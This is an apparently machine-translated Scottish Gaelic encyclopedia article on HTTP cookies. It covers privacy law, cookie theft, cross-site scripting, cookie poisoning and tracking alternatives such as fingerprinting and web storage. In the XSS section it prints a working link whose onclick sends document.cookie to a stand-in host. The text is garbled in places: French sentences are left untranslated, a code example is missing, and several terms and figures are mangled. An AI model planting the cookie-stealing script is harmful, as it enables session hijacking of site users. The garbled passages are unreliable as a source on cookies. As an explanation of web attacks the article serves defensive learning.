Ann am beachdachaidhean tòiseachaidh an stiùiridh, tha an reachdadair Eòrpach a’ sònrachadh, ge-tà: “Far a bheil e comasach gu teicnigeach agus èifeachdach, a rèir ullachaidhean buntainneach Stiùireadh 95/46/EC, faodar cead an neach-cleachdaidh a thaobh a’ ghiollachd a chuir an cèill tron cleachdadh shuidheachaidhean iomchaidh brabhsair no aplacaid eile”. Ach gu dearbh, chan eil brobhsair sam bith gu ruige seo ga dhèanamh comasach na briosgaidean teicnigeach riatanach a sgaradh bhon fheadhainn roghnach a bu chòir fhàgail gu roghainn an neach-cleachdaidh.

Chaidh an stiùireadh ùr seo atharrachadh le BP Beilgeach san Iuchar 2012. Tha sgrùdadh ann an 2014 a’ sealltainn gu bheil e doirbh dha eadhon BP tagradh a dhèanamh cuingealachaidhean an stiùiridh.

P3P

Tha an sònrachadh P3P a’ toirt a-steach comas do fhrithealaiche poileasaidh prìobhaideachd innse, a tha a’ mìneachadh dè an seòrsa fiosrachaidh a bhios e a’ cruinneachadh agus airson an adhbhar. Tha na poileasaidhean sin a’ toirt a-steach (ach chan eil iad cuingealaichte ri) cleachdadh an fhiosrachaidh a thèid a chruinneachadh le briosgaidean. A rèir mìneachaidhean P3P, faodaidh brobhsair gabhail ri no diùltadh briosgaidean le bhith a’ dèanamh coimeas eadar na poileasaidhean prìobhaideachd le roghainnean an neach-cleachdaidh no le bhith ag iarraidh air an neach-cleachdaidh, a’ taisbeanadh an aithris prìobhaideachd poileasaidh prìobhaideachd a dh’ ainmich an frithealaiche.

Bidh mòran bhrobhsairean, a’ gabhail a-steach Apple Safari agus tionndaidhean 6 agus 7 de Microsoft Internet Explorer, a’ toirt taic do P3P a leigeas leis a’ bhrobhsair faighinn a-mach am bu chòir gabhail ri stòradh bhriosgaid treas-phàrtaidh. Leigidh brabhsair Opera le luchd-cleachdaidh briosgaidean treas-phàrtaidh a dhiùltadh agus ìomhaigh tèarainteachd chruinneil agus sònraichte a chruthachadh airson raointean eadar-lìn. Leig Mozilla Firefox dreach 2 sìos taic P3P ach chuir e air ais e ann an dreach 3.

Faodar briosgaidean treas-phàrtaidh a bhacadh leis a’ mhòr-chuid de bhrobhsairean gus prìobhaideachd àrdachadh agus lorg sanasachd a lughdachadh, gun a bhith a’ toirt droch bhuaidh air eòlas lìn an neach-cleachdaidh. Bidh mòran de bhuidhnean sanasachd a 'tabhann roghainn dùnadh a-mach gu sanasachd cuimsichte, le bhith a’ stèidheachadh briosgaid gnèitheach anns a’ bhrobhsair a chuireas an targaid seo dheth, ach chan eil fuasgladh mar sin èifeachdach gu pragtaigeach, nuair a thathar ga mheas, leis gu bheil am briosgaid gnèitheach seo air a dhubhadh às cho luath ‘s a sguabas an neach-cleachdaidh às na briosgaidean sin a chuireas dheth an roghainn roghnach mach co-dhùnadh.

Eas-bhuannachdan cookies

A bharrachd air cùisean prìobhaideachd, tha cuid de dhuilgheadasan teicnigeach aig briosgaidean cuideachd. Gu sònraichte, chan eil iad an-còmhnaidh a 'comharrachadh luchd-cleachdaidh gu ceart, faodaidh iad coileanadh làraich a dhèanamh nas slaodaiche nuair a tha iad ann an àireamhan mòra, faodar an cleachdadh airson ionnsaighean tèarainteachd, agus tha iad a' strì ri gluasad stàite riochdachail, stoidhle ailtireachd a 'bhathar-bhog.

Dearbh-aithne neo-mhearachdach

Ma thèid barrachd air aon bhrobhsair a chleachdadh air coimpiutair, anns gach fear dhiubh tha an-còmhnaidh aonad stòraidh air leth airson briosgaidean. Mar sin chan eil briosgaidean ag aithneachadh neach, ach am measgachadh de chunntas cleachdaiche, coimpiutair, agus brobhsair lìn. Mar sin, faodaidh duine sam bith na cunntasan, coimpiutairean no brobhsairean sin a chleachdadh aig a bheil làn bhriosgaidean. San aon dòigh, chan eil briosgaidean a’ dèanamh eadar-dhealachadh eadar ioma-chleachdaichean aig a bheil an aon chunntas cleachdaiche, coimpiutair, agus brobhsair, leithid ann an “cafaidhean eadar-lìn” no àite sam bith a bheir cothrom an-asgaidh air goireasan coimpiutair.

Ach ann an cleachdadh tha e coltach gu bheil an aithris seo meallta sa mhòr-chuid de chùisean oir an-diugh tha coimpiutair “pearsanta” (no fòn cliste, no clàr, a tha nas miosa) air a chleachdadh sa mhòr-chuid le aon neach. tro na tha de dh’ fhiosrachadh air a chruinneachadh ruigidh targaidean pearsanaichte eadhon ged nach eil an neach “is e sin” air a chomharrachadh.

Goid briosgaidean

Faodar briosgaid a ghoid le coimpiutair eile air an lìonra.

Rè obrachadh àbhaisteach, thèid briosgaidean a chuir air ais eadar am frithealaiche (no buidheann de luchd-frithealaidh san aon raon) agus brabhsair coimpiutair an neach-cleachdaidh. Leis gum faod fiosrachadh mothachail a bhith ann am briosgaidean (ainm-cleachdaidh, facal-faire a chleachdar airson dearbhadh, msaa), cha bu chòir na luachan aca a bhith ruigsinneach do choimpiutairean eile. Tha goid bhriosgaid na ghnìomh far a bheil treas phàrtaidh gun chead air briosgaidean a ghlacadh.

Faodar briosgaidean a ghoid tro sniffer pacaid ann an ionnsaigh ris an canar fuadach seisean. Faodar trafaic air an lìon a ghlacadh agus a leughadh le coimpiutairean a bharrachd air an fheadhainn a tha a’ cur agus a’ faighinn (gu sònraichte air an àite poblach Wi-Fi gun chrioptachadh). Tha an trafaic seo a’ toirt a-steach briosgaidean a thèid a chuir thairis air seiseanan a’ cleachdadh protocol sìmplidh HTTP. Nuair nach eil trafaic lìonra air a chrioptachadh, faodaidh luchd-cleachdaidh droch-rùnach conaltradh luchd-cleachdaidh eile air an lìonra a leughadh le bhith a’ cleachdadh “sniffers pacaid”.

Faodar faighinn seachad air an duilgheadas seo le bhith a’ crioptachadh a’ cheangail eadar coimpiutair an neach-cleachdaidh agus an frithealaiche a’ cleachdadh protocol HTTPS. Faodaidh frithealaiche sònrachadh a bratach thèarainte fhad 'sa tha thu a' suidheachadh briosgaid; cha chuir am brabhsair e ach thairis air loidhne thèarainte, leithid ceangal SSL.

Ach bidh mòran làraich, ged a bhios iad a’ cleachdadh conaltradh crioptaichte HTTPS airson dearbhadh luchd-cleachdaidh (ie an duilleag logadh a-steach), nas fhaide air adhart a’ cur briosgaidean seisean agus dàta eile mar as àbhaist, tro cheanglaichean HTTP gun chrioptachadh airson adhbharan èifeachdais. Mar sin faodaidh luchd-ionnsaigh briosgaidean luchd-cleachdaidh eile a ghlacadh agus an atharrais air làraich iomchaidh no an cleachdadh ann an ionnsaighean cookie.

Sgriobtadh air an làrach: briosgaid nach bu chòir a bhith air a iomlaid ach eadar an fhrithealaiche agus an neach-dèiligidh air a chuir gu treas phàrtaidh eile.

Is e dòigh eile air briosgaidean a ghoid a bhith a’ sgrìobadh làraich agus toirt air a’ bhrobhsair fhèin briosgaidean a chuir gu frithealaichean droch-rùnach nach fhaigh iad gu bràth. Bidh brobhsairean ùr-nodha a’ ceadachadh pàirtean de chòd a thathar a’ sireadh a chuir an gnìomh bhon t-seirbheisiche. Ma gheibhear cothrom air briosgaidean rè ùine ruith, faodar na luachan aca a chuir an cèill ann an cruth air choreigin do luchd-frithealaidh nach bu chòir faighinn thuca. Cha bhith crioptachadh bhriosgaidean mus tèid an cur thairis air an lìonra a’ cuideachadh le bhith a’ cur bacadh air an ionnsaigh.

Mar as trice bidh an seòrsa seo de sgrìobhadh air an làrach air a chleachdadh le luchd-ionnsaigh air làraich a leigeas le luchd-cleachdaidh susbaint HTML a phostadh. Le bhith ag amalachadh pàirt de chòd co-fhreagarrach anns an tabhartas HTML, faodaidh neach-ionnsaigh briosgaidean fhaighinn bho luchd-cleachdaidh eile. Faodar eòlas air na briosgaidean sin a chleachdadh le bhith a’ ceangal ris an aon làrach a’ cleachdadh na briosgaidean a chaidh a ghoid, agus mar sin air aithneachadh mar an neach-cleachdaidh a chaidh na briosgaidean aca a ghoid.

Is e aon dòigh air casg a chuir air ionnsaighean leithid bratach HttpOnly a chleachdadh; tha e na roghainn, air a thoirt a-steach bho dhreach 6 de Internet Explorer ann am PHP bho dhreach 5.2.0 a thathar an dùil a dhèanamh gus am bi am briosgaid ruigsinneach don neach-dèiligidh faisg air an sgriobt. Ach, bu chòir do luchd-leasachaidh lìn seo a thoirt fa-near ann an leasachadh na làraich aca gus am bi iad dìonach bho sgrìobhadh air an làrach.

Is e cunnart tèarainteachd eile a thathas a’ cleachdadh togail iarrtas air an làrach.

Tha an sònrachadh teignigeach oifigeil a’ ceadachadh briosgaidean a chuir air ais dìreach gu frithealaichean san raon às an tàinig iad. Ach, faodar luach bhriosgaidean a chuir gu frithealaichean eile a’ cleachdadh dòighean eile seach cinn bhriosgaid.

Gu sònraichte, mar as trice tha cead aig cànanan sgrìobhaidh leithid JavaScript faighinn gu luachan cookie agus tha iad comasach air luachan neo-riaghailteach a chuir gu frithealaiche sam bith air an eadar-lìn. Tha an comas sgrìobhaidh seo air a chleachdadh bho làraich-lìn a leigeas le luchd-cleachdaidh susbaint HTML a phostadh airson luchd-cleachdaidh eile fhaicinn.

Mar eisimpleir, dh’ fhaodadh neach-ionnsaigh a tha ag obair air an àrainn example.com beachd a phostadh anns a bheil an ceangal a leanas a’ comharrachadh blog mòr-chòrdte nach eil smachd aca air a chaochladh:

<a href="#" onclick="window.location = 'http://exemple.com/stole.cgi?text=' + escape(document.cookie); return false;">Cliquez ici !</a>

Nuair a bhriogas cleachdaiche eile air a’ cheangal seo, cuiridh am brobhsair an gnìomh am pàirt onclick den chòd, agus mar sin cuiridh e an liosta de bhriosgaidean cleachdaiche a tha gnìomhach airson na duilleige seo an àite sreang document.cookie. Mar sin, thèid an liosta bhriosgaidean seo a chuir gu frithealaiche eisimpleir.com, agus mar sin bidh an neach-ionnsaigh comasach air briosgaidean an neach-cleachdaidh seo a chruinneachadh.

Tha an seòrsa ionnsaigh seo duilich a lorg air taobh an neach-cleachdaidh leis gu bheil an sgriobt a’ tighinn bhon aon raon a shuidhich a’ bhriosgaid, agus tha e coltach gu bheil an obrachadh gus na luachan a chuir a-mach air a cheadachadh leis an raon sin. Thathas den bheachd gu bheil e an urra ris an luchd-rianachd a tha ag obrachadh an seòrsa làrach seo cuingeachaidhean a chuir an sàs gus casg a chuir air foillseachadh còd droch-rùnach.

Chan fhaicear briosgaidean gu dìreach do phrògraman taobh teachdaiche leithid JavaScript ma chaidh an cur leis a’ bhratach HttpOnly. Bho shealladh an fhrithealaiche, is e an aon eadar-dhealachadh gu bheil raon ùr air a chur ris ann an loidhne bann-cinn Set-Cookie anns a bheil an sreang HttpOnly:

Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.exemple.net; HttpOnly

Nuair a gheibh am brabhsair a leithid de bhriosgaid, thathar an dùil a chleachdadh gu h-àbhaisteach anns an iomlaid HTTP a leanas, ach gun a bhith ga dhèanamh follaiseach do sgriobtaichean a chaidh a chuir gu bàs air taobh an neach-dèiligidh. Chan eil bratach HttpOnly mar phàirt de shònrachadh teicnigeach oifigeil sam bith, agus chan eil e air a bhuileachadh anns a h-uile brobhsair. Thoir an aire nach eil dòigh ann an-dràsta casg a chuir air leughadh agus sgrìobhadh bhriosgaidean seisean leis an dòigh XMLHTTPRequest.

Mion-atharrachadh susbaint: bidh neach-ionnsaigh a’ cur briosgaid neo-dhligheach gu frithealaiche, is dòcha air a dhèanamh à briosgaid dligheach a chuir am frithealaiche a-steach.

Ag atharrachadh briosgaidean

Cho luath ‘s a dh’ fheumar na briosgaidean a stòradh agus a thilleadh gun atharrachadh chun t-seirbheisiche, faodaidh neach-ionnsaigh luach nam briosgaidean atharrachadh mus tèid an cur air ais chun t-seirbheisiche. Mar eisimpleir, ma tha an luach iomlan ann am briosgaid a dh’ fheumas an neach-cleachdaidh a phàigheadh ​​​​airson na stuthan a chaidh a chuir ann an cairt bhùthan na bùtha, bidh atharrachadh an luach seo a ’toirt air an fhrithealaiche cunnart cosgais a chuir air an neach-ionnsaigh nas lugha na a’ phrìs tòiseachaidh. Canar am pròiseas airson luach briosgaidean atharrachadh puinnseanachadh cookie agus faodar a chleachdadh às deidh goid cookie gus an ionnsaigh a dhèanamh leantainneach.

Anns an dòigh cuir às do bhriosgaid, bidh an neach-ionnsaigh a’ gabhail brath air glitch brobhsair gus briosgaid neo-dhligheach a chuir chun t-seirbheisiche.

Chan eil a’ mhòr-chuid de làraich-lìn, ge-tà, a’ stòradh ach ID seisean - àireamh shònraichte air a chruthachadh air thuaiream a thèid a chleachdadh gus neach-cleachdaidh an t-seisein aithneachadh - anns a’ bhriosgaid fhèin, fhad ‘s a tha a h-uile fiosrachadh eile air a stòradh air an fhrithealaiche. Anns a 'chùis seo, tha an duilgheadas seo gu ìre mhòr air a rèiteachadh.

Làimhseachadh cookie eadar làraich-lìn

Tha dùil gum bi a bhriosgaidean fhèin aig gach làrach, agus mar sin cha bu chòir dha aon làrach a bhith comasach air briosgaidean atharrachadh no a chruthachadh co-cheangailte ri làrach eile. Faodaidh locht tèarainteachd brabhsair lìn leigeil le làraich droch-rùnach an riaghailt seo a bhriseadh. Thathas gu tric a’ toirt iomradh air cleachdadh a leithid de locht còcaireachd thar-làraich. Is dòcha gur e goid ID seisean adhbhar ionnsaighean mar sin.

Bu chòir do luchd-cleachdaidh na dreachan as ùire de bhrobhsairean lìn a chleachdadh anns a bheil na so-leòntachd sin cha mhòr air an cuir às.

Staid còmhstri eadar teachdaiche agus frithealaiche

Faodaidh cleachdadh bhriosgaidean còmhstri a chruthachadh eadar staid an neach-dèiligidh agus an stàit a tha air a stòradh sa bhriosgaid. Ma gheibh an neach-cleachdaidh briosgaid agus ma bhriogas e air a’ phutan “Air ais” den bhrobhsair, mar as trice chan eil staid a’ bhrobhsair mar a bha e roimhe seo. Mar eisimpleir, ma thèid basgaid stòr air-loidhne a chruthachadh le briosgaidean, chan urrainn susbaint na basgaid atharrachadh nuair a thilleas an neach-cleachdaidh gu eachdraidh a’ bhrabhsair: ma bhrùthas an neach-cleachdaidh putan gus artaigil a chuir ris a’ bhasgaid aige agus ma bhriogas tu air an "Till " putan, tha an artaigil fhathast san fhear seo. Is dòcha nach e seo rùn an neach-cleachdaidh, a tha gu cinnteach ag iarraidh cuir às don artaigil. Faodaidh seo leantainn gu neo-earbsach, troimh-chèile, agus biastagan. Mar sin bu chòir do luchd-leasachaidh lìn a bhith mothachail air an duilgheadas seo agus ceumannan a chuir an gnìomh gus suidheachaidhean mar seo a làimhseachadh.

Crìochnaich cookie

Tha eòlaichean tèarainteachd prìobhaideachd air a bhith a’ càineadh briosgaidean seasmhach airson nach eil iad deiseil airson tighinn gu crìch a dh’ aithghearr, agus mar sin a’ leigeil le làraich-lìn sùil a chumail air luchd-cleachdaidh agus am pròifil a thogail thar ùine. Tha an taobh seo de bhriosgaidean cuideachd mar phàirt den duilgheadas fuasglaidh seisean, oir faodar briosgaid leantainneach a chaidh a ghoid a chleachdadh gus atharrais a dhèanamh air neach-cleachdaidh airson ùine mhòr.

Gus leughadh cuideachd: GAFAM: cò iad? Carson a tha iad (uaireannan) cho eagallach?

Roghainnean eile an àite briosgaidean

Faodar cuid de dh’ obraichean a ghabhas dèanamh le briosgaidean a dhèanamh cuideachd le bhith a’ cleachdadh uidheamachdan eile a tha ga dhèanamh comasach briosgaidean a leigeil seachad no briosgaidean a chaidh a dhubhadh às ath-chruthachadh, a chruthaicheas cùisean prìobhaideachd san aon dòigh (no uaireannan nas miosa leis nach fhaicear iad) na briosgaidean.

Seòladh IP

Faodar sùil a chumail air luchd-cleachdaidh le seòladh IP a 'choimpiutair a' gairm na duilleige. Tha an dòigh seo air a bhith ri fhaighinn bho chaidh an Lìon Cruinne a thoirt a-steach, leis gu bheil duilleagan air an luchdachadh sìos bidh am frithealaiche ag iarraidh seòladh IP a’ choimpiutair a tha a’ ruith a’ bhrobhsair no an neach-ionaid, mura tèid gin a chleachdadh. Faodaidh am frithealaiche sùil a chumail air an fhiosrachadh seo ge bith a bheil briosgaidean gan cleachdadh no nach eil. Ach, mar as trice chan eil na seòlaidhean sin cho earbsach ann a bhith ag aithneachadh neach-cleachdaidh na briosgaidean oir dh’ fhaodadh coimpiutairean agus proxies a bhith air an roinn le ioma-chleachdaichean, agus dh’ fhaodadh gum faigh an aon choimpiutair seòladh IP eadar-dhealaichte air gach seisean obrach (leithid c gu tric airson ceanglaichean fòn) .

Faodaidh tracadh le seòlaidhean IP a bhith earbsach ann an cuid de shuidheachaidhean, leithid ceanglaichean bann-leathann a chumas an aon sheòladh IP airson ùine mhòr, fhad ‘s a tha cumhachd air adhart.

Tha cuid de shiostaman mar Tor air an dealbhadh gus dìomhaireachd an eadar-lìn a chumail suas agus gus seòladh le seòladh IP a dhèanamh do-dhèanta no do-dhèanta.

URL

Tha dòigh-obrach nas mionaidiche stèidhichte air fiosrachadh a chur a-steach ann an URLan. Is e am pàirt sreang ceiste den URL aon innleachd a thathas a’ cleachdadh gu h-àbhaisteach airson an adhbhair seo, ach faodar pàirtean eile a chleachdadh cuideachd. Bidh an dà chuid an frithealaiche Java agus na h-innealan seisean PHP a’ cleachdadh an dòigh seo mura h-eil briosgaidean an comas.

Tha an dòigh seo a’ toirt a-steach am frithealaiche lìn a’ cur iarrtasan sreang ri ceanglaichean na duilleige lìn a bhios ga ghiùlan nuair a thèid a chur chun bhrobhsair. Nuair a leanas an cleachdaiche ceangal, tillidh am brabhsair an t-sreang ceiste ceangailte ris an fhrithealaiche.

Tha sreangan ceiste a thathar a’ cleachdadh airson an adhbhair seo agus briosgaidean glè choltach, an dà chuid mar fhiosrachadh air a thaghadh gu neo-riaghailteach leis an fhrithealaiche agus air a thilleadh leis a’ bhrabhsair. Ach, tha beagan eadar-dhealachaidhean ann: nuair a thèid URL anns a bheil sreang ceiste ath-chleachdadh, thèid an aon fhiosrachadh a chuir chun t-seirbheisiche. Mar eisimpleir, ma tha roghainnean cleachdaiche air an còdachadh ann an sreath ceiste de URL agus ma chuireas an neach-cleachdaidh an URL sin gu cleachdaiche eile tro phost-d, bidh an cleachdaiche sin comasach air na roghainnean sin a chleachdadh cuideachd.

Air an làimh eile, nuair a ruigeas neach-cleachdaidh an aon duilleag dà uair, chan eil gealltanas sam bith ann gun tèid an aon sreang ceiste a chleachdadh an dà thuras. Mar eisimpleir, ma thig neach-cleachdaidh air tìr air duilleag bho dhuilleag làrach a-staigh a’ chiad uair agus a’ tighinn air tìr air an aon duilleag bho dhuilleag a-muigh an dàrna turas, mar as trice bidh sreang na ceiste an coimeas ri duilleag na làraich eadar-dhealaichte, fhad ‘s a tha na briosgaidean mar an ceudna. .

Tha eas-bhuannachdan eile de shreathan ceiste co-cheangailte ri tèarainteachd: tha cumail dàta a chomharraicheas seisean ann an sreangan ceiste a’ comasachadh no a’ sìmpleachadh ionnsaighean socrachadh seisean, ionnsaighean iomraidh aithnichear, agus buannachdan eile. Tha e nas tèarainte a bhith a’ dol seachad air IDan seisean mar bhriosgaidean HTTP.

Raon cruth falaichte

Is e aon sheòrsa de thracadh seisean, air a chleachdadh le ASP.NET, foirmean lìn a chleachdadh le raointean falaichte. Tha an dòigh seo glè choltach ri bhith a’ cleachdadh sreangan ceiste URL gus fiosrachadh a ghiùlan agus tha na h-aon bhuannachdan agus eas-bhuannachdan aige; agus ma thèid am foirm a phròiseasadh leis an dòigh HTTP GET, bidh na raointean gu bhith nam pàirt de URL a’ bhrobhsair a chuireas e nuair a chuireas tu a-steach am foirm. Ach tha a’ mhòr-chuid de fhoirmean air an giullachd le HTTP POST, a dh’ adhbharaicheas fiosrachadh an fhoirm, a’ gabhail a-steach raointean falaichte, a chur ris mar chur-a-steach a bharrachd nach eil na phàirt den URL no na bhriosgaid.

Tha dà bhuannachd aig an dòigh-obrach seo bho shealladh tracadh: an toiseach, le bhith a’ cumail sùil air an fhiosrachadh a chaidh a chuir sa chòd stòr HTML agus cuir a-steach POST seach an URL leigidh an neach-cleachdaidh cuibheasach an tracadh seo a sheachnadh; san dàrna h-àite, chan eil fiosrachadh an t-seisein air a chopaigeadh nuair a nì an neach-cleachdaidh leth-bhreac den URL (gus an duilleag a shàbhaladh gu diosc no a chuir air post-d, mar eisimpleir).

uinneag.ainm

Faodaidh a h-uile brobhsair lìn cumanta tòrr dàta a stòradh (2MB gu 32MB) tro JavaScript a’ cleachdadh seilbh window.name an DOM. Faodar an dàta seo a chleachdadh an àite briosgaidean seisean agus tha e cuideachd air a chleachdadh thar raointean. Faodar an dòigh-obrach a cheangal ri nithean JSON gus seata iom-fhillte de chaochladairean seisean taobh teachdaiche a stòradh.

Is e an ìsleachadh gum bi uinneag falamh aig gach uinneag no taba an toiseach. nuair a bhios tu a’ brobhsadh le tabaichean (air am fosgladh leis a’ chleachdaiche) tha seo a’ ciallachadh nach bi ainm uinneig air na tabaichean a thèid fhosgladh leotha fhèin. A bharrachd air an sin faodar window.name a chleachdadh gus sùil a chumail air luchd-tadhail thar diofar làraich a dh’ fhaodadh a bhith nan cùis prìobhaideachd.

Ann an cuid de dhòighean faodaidh seo a bhith nas tèarainte na briosgaidean, air sgàth nach eil an frithealaiche an sàs ann, agus mar sin ga dhèanamh so-leònte ri ionnsaigh lìonra bho bhriosgaidean sniffer. Ach, ma thèid ceumannan sònraichte a ghabhail gus an dàta a dhìon, tha e so-leònte ri tuilleadh ionnsaighean, leis gu bheil an dàta ri fhaighinn tro làraich eile a chaidh fhosgladh san aon uinneag.

HTTP dearbhadh

Tha am protocol HTTP a’ toirt a-steach na protocolaidhean dearbhaidh ruigsinneachd bunaiteach agus an geàrr-chunntas dearbhaidh ruigsinneachd, a leigeas le ruigsinneachd air duilleag-lìn dìreach nuair a tha an neach-cleachdaidh air an t-ainm-cleachdaidh agus am facal-faire a thoirt seachad. Ma dh’ iarras am frithealaiche teisteanas gus cothrom fhaighinn air duilleag-lìn, bidh am brabhsair ga iarraidh bhon neach-cleachdaidh agus nuair a gheibhear e, bidh am brabhsair ga stòradh agus ga chuir anns a h-uile iarrtas HTTP às deidh sin. Faodar am fiosrachadh seo a chleachdadh gus sùil a chumail air an neach-cleachdaidh.

Rud ionadail roinnte

Ma tha brobhsair a’ toirt a-steach plugan Adobe Flash Player, bidh an stuthan co-roinnte ionadail faodar a chleachdadh airson an aon adhbhar ri briosgaidean. Faodaidh iad a bhith nan roghainn tarraingeach do luchd-leasachaidh lìn air sgàth:

• is e a’ chrìoch meud bunaiteach airson nì co-roinnte ionadail 100 KB;
• tha sgrùdaidhean tèarainteachd air leth bho sgrùdaidhean cookie luchd-cleachdaidh (mar sin faodar stuthan co-roinnte ionadail a cheadachadh nuair nach eil briosgaidean ann).

Tha a’ phuing mu dheireadh seo, a tha a’ dèanamh eadar-dhealachadh air a’ phoileasaidh riaghlaidh cookie bho phoileasaidh nan stuthan co-roinnte ionadail aig Adobe a’ togail cheistean a thaobh riaghladh an neach-cleachdaidh air na roghainnean prìobhaideachd aige: feumaidh e a bhith mothachail nach eil buaidh sam bith aig an riaghladh aige air briosgaidean air riaghladh nithean co-roinnte ionadail, agus a chaochladh.

Is e càineadh eile air an t-siostam seo nach gabh a chleachdadh ach tron ​​​​plugan Adobe Flash Player a tha sealbhach agus chan e inbhe lìn.

Seasmhachd taobh teachdaiche

Bidh cuid de bhrobhsairean lìn a’ toirt taic do uidheamachd seasmhachd stèidhichte air sgriobt, a leigeas leis an duilleag fiosrachadh a stòradh gu h-ionadail airson a chleachdadh nas fhaide air adhart. Bidh Internet Explorer, mar eisimpleir, a’ toirt taic do dh’ fhiosrachadh leantainneach ann an eachdraidh brabhsair, comharran-leabhair, ann an cruth a tha air a stòradh ann an XML, no gu dìreach le duilleag-lìn air a shàbhaladh gu diosc. Airson Microsoft Internet Explorer 5, tha dòigh dàta cleachdaiche ri fhaighinn tro ghiùlan DHTML.

Thug an W3C a-steach ann an HTML 5 API JavaScript ùr airson stòradh dàta taobh teachdaiche ris an canar stòradh lìn agus bha e ag amas air briosgaidean a chuir an àite gu maireannach. Tha e coltach ri briosgaidean ach le comas air a leasachadh gu mòr agus gun a bhith a’ stòradh fiosrachadh ann am bann-cinn iarrtasan HTTP. Tha an API a’ ceadachadh dà sheòrsa de stòradh lìn: stòradh ionadail agus stòradh seisean, coltach ri briosgaidean leantainneach agus briosgaidean seisean (ach a-mhàin gun tig briosgaidean seisean gu crìch nuair a bhios am brabhsair dùinte fhad ‘s a tha seisean-stòraidh tighinn gu crìch nuair a bhios an taba dùinte), fa leth. Tha stòradh lìn a’ faighinn taic bho Mozilla Firefox 3.5, Google Chrome 5, Apple Safari 4, Microsoft Internet Explorer 8 agus Opera 10.50.

Mar as trice bidh inneal eadar-dhealaichte an urra ri tasgadh brabhsair (mar chuimhneachan seach ùrachadh) a’ cleachdadh prògraman JavaScript ann an duilleagan lìn. 

Mar eisimpleir, faodaidh an taga a bhith air duilleag . La première fois que la page se charge, le programme exemple.js est aussi chargé. 

Aig an ìre seo, tha am prògram fhathast ann an cuimhne tasgadan agus chan eil an duilleag air an deach tadhal air ath-luchdachadh an dàrna turas. Mar thoradh air an sin, ma tha caochladair cruinne sa phrògram (mar eisimpleir var id = 3243242;), tha an aithnichear seo fhathast dligheach agus faodar a chleachdadh le còd JavaScript eile aon uair ‘s gu bheil an duilleag air a luchdachadh a-rithist, no aon uair‘ s gu bheil duilleag a tha a’ ceangal a’ phrògraim air a luchdachadh. 

Is e prìomh ana-cothrom an dòigh seo gum feum an caochladair cruinne JavaScript a bhith statach, a’ ciallachadh nach urrainnear atharrachadh no sguabadh às mar bhriosgaid.

lorgan-meòir brabhsair lìn

Is e lorgan-meòir brabhsair fiosrachadh a thèid a chruinneachadh mu shuidheachaidhean rèiteachaidh brobhsair airson adhbharan aithneachaidh. Faodar na lorgan-meòir sin a chleachdadh gus neach-cleachdaidh eadar-lìn no inneal aithneachadh gu h-iomlan no ann am pàirt eadhon nuair a tha briosgaidean à comas.

Tha fiosrachadh rèiteachaidh brabhsair lìn bunaiteach air a bhith air a chruinneachadh o chionn fhada le seirbheisean luchd-èisteachd làrach-lìn gus trafaic lìn daonna a thomhas gu ceart agus diofar sheòrsaichean foill cliog a lorg. Le cuideachadh bho chànanan sgrìobhaidh taobh teachdaiche, tha cruinneachadh fiosrachaidh fada nas cruinne nis comasach.

Le bhith ag atharrachadh an fhiosrachaidh seo gu beagan sreang bheir sin lorgan-meòir inneal. Ann an 2010, thomhais an Electronic Frontier Foundation (EFF) an entropy de lorgan-meòir brabhsair co-dhiù. 18,1 pìosan, agus bha sin mus do chuir adhartasan ann an lorgan-meòir canabhas 5,7 pìosan ris an entropy sin.

Briosgaidean ann an ùine ghoirid

Is e faidhlichean teacsa beaga a th’ ann am briosgaidean a tha air an stòradh leis a’ bhrabhsair lìn air draibh cruaidh neach-tadhail làrach-lìn agus a thathas a’ cleachdadh (am measg rudan eile) gus fiosrachadh mun neach-tadhail no an turas tron ​​làraich a chlàradh. Mar sin faodaidh am maighstir-lìn cleachdaidhean neach-tadhail aithneachadh agus taisbeanadh na làraich aige a phearsanachadh airson gach neach-tadhail; bidh briosgaidean an uairsin ga dhèanamh comasach cuimhne a chumail air cia mheud artaigil a tha ri fhaicinn air an duilleag dachaigh no eadhon na teisteanasan logadh a-steach airson pàrtaidh prìobhaideach sam bith a chumail: nuair a thilleas an neach-tadhail chun làrach, chan fheum e tuilleadh ainm agus facal-faire a chuir a-steach. aithneachadh, leis gu bheil iad air an leughadh gu fèin-ghluasadach sa bhriosgaid.

Tha beatha-beatha cuibhrichte aig briosgaid, air a shuidheachadh le dealbhaiche na làraich. Faodaidh iad cuideachd tighinn gu crìch aig deireadh an t-seisein air an làrach, a tha a 'freagairt ri dùnadh a' bhrabhsair. Tha briosgaidean air an cleachdadh gu farsaing gus beatha a dhèanamh nas fhasa do luchd-tadhail agus gus fiosrachadh nas freagarraiche a thaisbeanadh dhaibh. Ach tha dòighean sònraichte ga dhèanamh comasach neach-tadhail a leantainn air grunn làraich agus mar sin a bhith a 'tional agus a' sgrùdadh fiosrachadh fìor fharsaing mu na cleachdaidhean aige. Tha an dòigh seo air cliù a thoirt do chleachdadh bhriosgaidean mar dhòigh sgrùdaidh a bhriseas prìobhaideachd luchd-tadhail, a tha gu mì-fhortanach a’ freagairt ri fìrinn ann an iomadh cùis cleachdaidh airson adhbharan neo-theicnigeach no gun a bhith a’ toirt spèis do dhùilean luchd-cleachdaidh. .

Mar fhreagairt air na h-eagal dligheach sin, tha HTML 5 a’ toirt a-steach API JavaScript ùr airson stòradh dàta taobh teachdaiche ris an canar stòradh lìn, a tha tòrr nas tèarainte agus le comas nas motha, a tha ag amas air briosgaidean a chuir an àite.

Stòradh briosgaidean

Le cuid de bhrobhsairean, tha e furasta briosgaid a dheasachadh, tha deasaiche teacsa sìmplidh mar Notepad gu leòr airson a luachan atharrachadh le làimh.

Bidh briosgaidean air an sàbhaladh ann an dòigh eadar-dhealaichte a rèir a’ bhrobhsair:

• Microsoft Internet Explorer sàbhail gach briosgaid ann am faidhle eile;
• Mozilla Firefox sàbhail a briosgaidean gu lèir ann an aon fhaidhle;
• Opera a’ sàbhaladh a briosgaidean gu lèir ann an aon fhaidhle agus gan crioptachadh (do-dhèanta an atharrachadh ach a-mhàin anns na roghainnean bathar-bog);
• An ìomhaigheag airson Apple Safari a' sàbhaladh a briosgaidean gu lèir ann an aon fhaidhle leudachaidh .plist. Tha atharrachadh comasach ach chan eil e gu math furasta, mura tèid thu tro na roghainnean bathar-bog.

Tha feum air brobhsairean gus taic a thoirt co-dhiù :

• 300 briosgaidean aig an aon àm;
• 4 o gach briosgaid;
• 20 briosgaid gach aoigh no àrainn.